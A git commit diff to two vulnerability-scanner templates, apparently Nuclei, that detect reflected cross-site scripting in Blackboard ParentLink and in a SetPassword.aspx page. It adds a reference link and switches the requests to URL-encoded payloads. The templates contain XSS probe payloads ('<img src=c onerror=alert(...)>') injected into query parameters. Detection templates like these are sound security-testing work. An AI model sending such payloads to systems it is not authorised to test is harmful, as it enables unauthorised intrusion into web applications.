Added some reference

patch-1
sandeep 2021-03-11 20:33:36 +05:30
parent 881cedaabc
commit 86faa863f6
2 changed files with 3 additions and 3 deletions

View File

@ -5,12 +5,13 @@ info:
author: r3naissance
severity: medium
tags: blackboard,parentlink,xss
reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
requests:
- method: GET
path:
- '{{BaseURL}}/main/blank?message_success=<img src=c onerror=alert(8675309)>'
- '{{BaseURL}}/main/blank?message_error=<img src=c onerror=alert(8675309)>'
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
matchers-condition: and
matchers:

View File

@ -9,7 +9,6 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/SetPassword.aspx?e="><img src=c onerror=alert(8675309)>'
- '{{BaseURL}}/SetPassword.aspx?e=%22%3E%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
matchers-condition: and